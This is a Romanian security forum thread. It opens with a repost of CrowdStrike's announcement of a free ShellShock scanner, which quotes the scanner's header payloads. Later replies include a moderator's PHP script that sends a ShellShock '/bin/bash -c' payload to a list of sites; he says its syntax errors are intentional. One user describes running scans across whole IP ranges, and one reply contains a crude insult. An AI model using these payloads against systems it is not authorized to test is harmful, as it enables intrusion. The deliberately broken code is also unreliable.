Nytro Posted September 30, 2014 Report Posted September 30, 2014 CrowdStrike ShellShock Scanner – New Community Tool The Tool Box 30 Sep 2014 Dmitri Alperovitch A large number of ShellShock online vulnerability scanners have been released since the bug disclosure on September 24. These tools can be great for scanning external web servers, however, just as we’ve seen with the Heartbleed scanners, there is a real unfilled need for a tool that can be easily used to scan for vulnerable internal systems, in addition to the external servers. While Unix gurus can fairly easily write scripts to accomplish this task, many prefer to have an easy to use Windows GUI tool to simplify the vulnerability assessment process. And so after once again having put Robin Keir, our toolbuilder extraordinaire, on the case, we are proud to announce CrowdStrike ShellShock Scanner as our latest free community tool. As with our Heartbleed scanner, the tool can import a list of IP ranges or website URLs to scan. Multiple port ranges can be selected and the results can be saved in CSV, HTML, XML or text format. Unfortunately network-based scanning for vulnerable ShellShock servers is nowhere as easy as identifying the Heartbleed servers since the triggering of execution of the bash shell is usually very specific to each application. Even to effectively scan HTTP servers, one needs to know the path to all of the CGI scripts that are dependent on bash and sometimes even the specific GET or POST parameters that need to be supplied to the script in order to trigger the vulnerability. We have preloaded the scanner with almost 400 common CGI paths that will be attemped during the full scan and have allowed the import of additional paths to test custom or less popular CGI applications. The scanner works by sending an HTTP GET request to each pre-configured CGI path of the scanned target with the following headers:Cookie: () { :; }; echo -e "\r\n\r\n<random string>"Referer: () { :; }; echo -e "\r\n\r\n<random string>"User-Agent: CrowdStrike ShellShock Scanner/1.0Test: () { :; }; echo -e "\r\n\r\n<random string>"When the CGI script launches bash with the supplied environment parameters, it should trigger the execution of the echo command on a vulnerable system. With most scripts, the random string in the output of the echo command will be sent back in the body of the HTTP response, allowing the scanner to detect it and deem the system vulnerable. We deliberately picked the innocuous echo command as the one to execute by the scanner so as to minimize the chance of the scan doing anything harmful to the vulnerable target. Please note that even a full internal and external IP range scan of your network will not provide you with a complete assurance that you are not vulnerable to ShellShock. In addition to the limitations of scanning CGI applications, this scanner is not able to determine the vulnerability of SMTP servers or DHCP clients to the bug. Nor is it able to be used to test for privilege escalation vulnerabilities via SSH or on local Unix and OSX systems. It is still paramount that you apply patches across your entire population of systems that utilize bash shell as soon as possible. You can download CrowdStrike ShellShock Scanner here.Sursa: CrowdStrike ShellShock Scanner – New Community Tool | Adversary Manifesto Quote
Moderators Dragos Posted September 30, 2014 Moderators Report Posted September 30, 2014 Asta e de script-kiddie. Eu in locul developerului as fi pus si un script de minat bitcoini in aplicatie ca daca tot descarca copiii, macar sa fac si eu un ban cinstit.Mai rapid se poate face asa din consola.<?php$situri = array("http://site.ro/","http://site2.ro");foreach($situri as $sit){ if(scaneaza($sit)) echo $sit . "\n";}function scaneaza($url){ $cmd = "ls"; $context = stream_context_create( array( 'http' => array( 'method' => 'GET', 'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"' ) ) if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0) return 1; else return 0;}?> Quote
Gotyc Posted October 2, 2014 Report Posted October 2, 2014 Mai rapid se poate face asa din consola.<?php$situri = array("http://site.ro/","http://site2.ro");foreach($situri as $sit){ if(scaneaza($sit)) echo $sit . "\n";}function scaneaza($url){ $cmd = "ls"; $context = stream_context_create( array( 'http' => array( 'method' => 'GET', 'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"' ) ) if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0) return 1; else return 0;}?>Ai mancat vreo 2 ))la $context = ))); la sfarsit:)) Quote
Moderators Dragos Posted October 2, 2014 Moderators Report Posted October 2, 2014 Ai mancat vreo 2 ))la $context = ))); la sfarsit:))Sunt intentionat puse. Quote
florinul Posted October 4, 2014 Report Posted October 4, 2014 l-am incercat pe clasa 66.33 nu a gasit nici unul vuln ori nu functioneaza cum trebuie . am sa incec pe 66. * Quote
Aerosol Posted October 5, 2014 Report Posted October 5, 2014 pt ce anume e aplicatia asta ?Daca tot stai pe aici de plictiseala (fiindca esti mai mult decat paralel) foloseste google / google.translate e chiar asa de greu?da-o in pula mea de treaba ai 21 de posturi care sunt extrem de stupide... Quote
florinul Posted October 9, 2014 Report Posted October 9, 2014 am gasit eu cate vuln care apare ca e vulnerabil da nu arata cgi-ul arata doar ip nustiu ce sa zic... Quote
